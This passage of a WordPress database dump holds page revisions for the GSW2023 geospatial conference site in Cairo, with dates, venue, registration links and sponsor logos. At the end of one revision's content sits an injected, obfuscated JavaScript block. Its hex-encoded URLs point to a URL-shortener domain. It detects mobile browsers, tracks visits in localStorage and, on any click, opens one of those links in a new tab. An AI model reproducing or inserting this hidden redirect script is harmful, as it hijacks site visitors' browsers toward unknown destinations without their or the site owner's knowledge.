href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:02:57','2023-05-17 05:02:57','',3066,'https://gsw2023.com/?p=4520',0,'revision','',0),
(4521,1,'2023-05-17 05:05:51','2023-05-17 05:05:51','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" 